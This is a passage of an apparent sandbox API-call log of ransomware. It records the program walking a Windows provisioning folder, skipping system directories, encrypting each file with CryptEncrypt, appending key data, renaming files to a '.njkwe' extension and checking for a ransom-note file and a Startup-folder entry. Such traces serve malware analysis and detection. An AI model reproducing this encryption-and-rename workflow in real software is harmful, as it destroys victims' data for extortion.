(lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\505__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.532] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\505__Connections_Cellular_Verizon (United States) Admin_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\505__connections_cellular_verizon (united states) admin_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.533] GetTickCount () returned 0x1154b1f [0081.533] GetTickCount () returned 0x1154b1f [0081.533] GetTickCount () returned 0x1154b1f [0081.533] GetTickCount () returned 0x1154b1f [0081.533] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.533] GetProcessHeap () returned 0xbe0000 [0081.533] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.533] ReadFile (in: hFile=0x43c, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2da, lpOverlapped=0x0) returned 1 [0081.535] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd26, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.535] WriteFile (in: hFile=0x43c, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2da, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2da, lpOverlapped=0x0) returned 1 [0081.535] GetProcessHeap () returned 0xbe0000 [0081.535] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.535] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.535] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.535] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.535] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.535] CloseHandle (hObject=0x43c) returned 1 [0081.535] GetProcessHeap () returned 0xbe0000 [0081.535] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.535] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\505__Connections_Cellular_Verizon (United States) Admin_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 193 [0081.535] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\505__Connections_Cellular_Verizon (United States) Admin_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\505__connections_cellular_verizon (united states) admin_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\505__Connections_Cellular_Verizon (United States) Admin_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\505__connections_cellular_verizon (united states) admin_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.536] GetProcessHeap () returned 0xbe0000 [0081.536] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.536] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9123a200, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9123a200, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9123a200, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x28b, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="506__Connections_Cellular_Verizon (United States) App_i3$(__MVID)@WAP.provxml", cAlternateFileName="506__C~1.PRO")) returned 1 [0081.536] lstrcmpiW (lpString1="506__Connections_Cellular_Verizon (United States) App_i3$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.536] lstrcmpiW (lpString1="506__Connections_Cellular_Verizon (United States) App_i3$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.536] lstrcmpiW (lpString1="506__Connections_Cellular_Verizon (United States) App_i3$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.536] lstrcmpiW (lpString1="506__Connections_Cellular_Verizon (United States) App_i3$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.536] lstrcmpiW (lpString1="506__Connections_Cellular_Verizon (United States) App_i3$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.536] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\506__Connections_Cellular_Verizon (United States) App_i3$(__MVID)@WAP.provxml") returned 171 [0081.536] StrStrIW (lpFirst="506__Connections_Cellular_Verizon (United States) App_i3$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.536] lstrcmpW (lpString1="506__Connections_Cellular_Verizon (United States) App_i3$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.536] lstrcmpW (lpString1="506__Connections_Cellular_Verizon (United States) App_i3$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.536] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\506__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.536] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\506__Connections_Cellular_Verizon (United States) App_i3$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\506__connections_cellular_verizon (united states) app_i3$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.537] GetTickCount () returned 0x1154b1f [0081.537] GetTickCount () returned 0x1154b1f [0081.537] GetTickCount () returned 0x1154b1f [0081.537] GetTickCount () returned 0x1154b1f [0081.537] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.537] GetProcessHeap () returned 0xbe0000 [0081.537] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.537] ReadFile (in: hFile=0x43c, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x28b, lpOverlapped=0x0) returned 1 [0081.539] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd75, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.539] WriteFile (in: hFile=0x43c, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x28b, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x28b, lpOverlapped=0x0) returned 1 [0081.539] GetProcessHeap () returned 0xbe0000 [0081.539] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.539] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.539] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.539] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.539] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.539] CloseHandle (hObject=0x43c) returned 1 [0081.539] GetProcessHeap () returned 0xbe0000 [0081.539] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.539] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\506__Connections_Cellular_Verizon (United States) App_i3$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 191 [0081.540] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\506__Connections_Cellular_Verizon (United States) App_i3$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\506__connections_cellular_verizon (united states) app_i3$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\506__Connections_Cellular_Verizon (United States) App_i3$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\506__connections_cellular_verizon (united states) app_i3$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.540] GetProcessHeap () returned 0xbe0000 [0081.540] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.540] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9123a200, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9123a200, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9123a200, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x28b, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="507__Connections_Cellular_Verizon (United States) Ims_i2$(__MVID)@WAP.provxml", cAlternateFileName="507__C~1.PRO")) returned 1 [0081.540] lstrcmpiW (lpString1="507__Connections_Cellular_Verizon (United States) Ims_i2$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.540] lstrcmpiW (lpString1="507__Connections_Cellular_Verizon (United States) Ims_i2$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.540] lstrcmpiW (lpString1="507__Connections_Cellular_Verizon (United States) Ims_i2$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.540] lstrcmpiW (lpString1="507__Connections_Cellular_Verizon (United States) Ims_i2$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.540] lstrcmpiW (lpString1="507__Connections_Cellular_Verizon (United States) Ims_i2$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.540] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\507__Connections_Cellular_Verizon (United States) Ims_i2$(__MVID)@WAP.provxml") returned 171 [0081.540] StrStrIW (lpFirst="507__Connections_Cellular_Verizon (United States) Ims_i2$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.542] lstrcmpW (lpString1="507__Connections_Cellular_Verizon (United States) Ims_i2$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.542] lstrcmpW (lpString1="507__Connections_Cellular_Verizon (United States) Ims_i2$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.542] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\507__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.542] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\507__Connections_Cellular_Verizon (United States) Ims_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\507__connections_cellular_verizon (united states) ims_i2$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.542] GetTickCount () returned 0x1154b1f [0081.542] GetTickCount () returned 0x1154b1f [0081.542] GetTickCount () returned 0x1154b1f [0081.542] GetTickCount () returned 0x1154b1f [0081.542] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.542] GetProcessHeap () returned 0xbe0000 [0081.542] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.542] ReadFile (in: hFile=0x43c, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x28b, lpOverlapped=0x0) returned 1 [0081.544] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd75, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.544] WriteFile (in: hFile=0x43c, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x28b, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x28b, lpOverlapped=0x0) returned 1 [0081.544] GetProcessHeap () returned 0xbe0000 [0081.544] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.544] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.544] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.545] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.545] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.545] CloseHandle (hObject=0x43c) returned 1 [0081.545] GetProcessHeap () returned 0xbe0000 [0081.545] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.545] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\507__Connections_Cellular_Verizon (United States) Ims_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 191 [0081.545] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\507__Connections_Cellular_Verizon (United States) Ims_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\507__connections_cellular_verizon (united states) ims_i2$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\507__Connections_Cellular_Verizon (United States) Ims_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\507__connections_cellular_verizon (united states) ims_i2$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.546] GetProcessHeap () returned 0xbe0000 [0081.546] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.546] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9123a200, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9123a200, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9123a200, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x295, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="508__Connections_Cellular_Verizon (United States) Internet_i0$(__MVID)@WAP.provxml", cAlternateFileName="508__C~1.PRO")) returned 1 [0081.546] lstrcmpiW (lpString1="508__Connections_Cellular_Verizon (United States) Internet_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.546] lstrcmpiW (lpString1="508__Connections_Cellular_Verizon (United States) Internet_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.546] lstrcmpiW (lpString1="508__Connections_Cellular_Verizon (United States) Internet_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.546] lstrcmpiW (lpString1="508__Connections_Cellular_Verizon (United States) Internet_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.546] lstrcmpiW (lpString1="508__Connections_Cellular_Verizon (United States) Internet_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.546] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\508__Connections_Cellular_Verizon (United States) Internet_i0$(__MVID)@WAP.provxml") returned 176 [0081.546] StrStrIW (lpFirst="508__Connections_Cellular_Verizon (United States) Internet_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.546] lstrcmpW (lpString1="508__Connections_Cellular_Verizon (United States) Internet_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.546] lstrcmpW (lpString1="508__Connections_Cellular_Verizon (United States) Internet_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.546] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\508__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.546] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\508__Connections_Cellular_Verizon (United States) Internet_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\508__connections_cellular_verizon (united states) internet_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.546] GetTickCount () returned 0x1154b1f [0081.546] GetTickCount () returned 0x1154b1f [0081.546] GetTickCount () returned 0x1154b1f [0081.546] GetTickCount () returned 0x1154b1f [0081.546] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.547] GetProcessHeap () returned 0xbe0000 [0081.547] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.547] ReadFile (in: hFile=0x43c, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x295, lpOverlapped=0x0) returned 1 [0081.548] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd6b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.548] WriteFile (in: hFile=0x43c, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x295, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x295, lpOverlapped=0x0) returned 1 [0081.548] GetProcessHeap () returned 0xbe0000 [0081.548] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.548] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.548] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.548] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.549] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.549] CloseHandle (hObject=0x43c) returned 1 [0081.549] GetProcessHeap () returned 0xbe0000 [0081.549] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.549] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\508__Connections_Cellular_Verizon (United States) Internet_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 196 [0081.549] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\508__Connections_Cellular_Verizon (United States) Internet_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\508__connections_cellular_verizon (united states) internet_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\508__Connections_Cellular_Verizon (United States) Internet_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\508__connections_cellular_verizon (united states) internet_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.549] GetProcessHeap () returned 0xbe0000 [0081.549] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.550] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9123a200, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9123a200, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9123a200, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1db, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="509__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="509__C~1.PRO")) returned 1 [0081.550] lstrcmpiW (lpString1="509__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0081.550] lstrcmpiW (lpString1="509__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0081.550] lstrcmpiW 